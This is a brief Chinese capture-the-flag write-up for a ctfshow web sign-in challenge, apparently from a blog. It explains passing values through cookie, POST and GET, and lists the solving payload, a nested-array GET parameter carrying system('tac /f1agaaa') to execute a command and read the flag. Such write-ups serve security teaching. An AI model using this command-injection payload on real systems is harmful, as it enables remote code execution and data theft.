ctfshow--web
【1】菜狗杯web签到
考点:传参方式 嵌套模型
【get】url
【post】hacker
【cookie】hacker
【request】url/hacker
难点:
【1】cookie传参不允许中文,需要进行url编码
【2】request传参能够通过get或者post
【3】system(tac‘flag’) 查找flag命令
1.CTFshow-QQ%E7%BE%A4:=c //COOKIE
2.c=b //POST
3.?b=a&a[6][0][7][5][8][0][9][4][4]=system('tac /f1agaaa'); //GET
浙公网安备 33010602011771号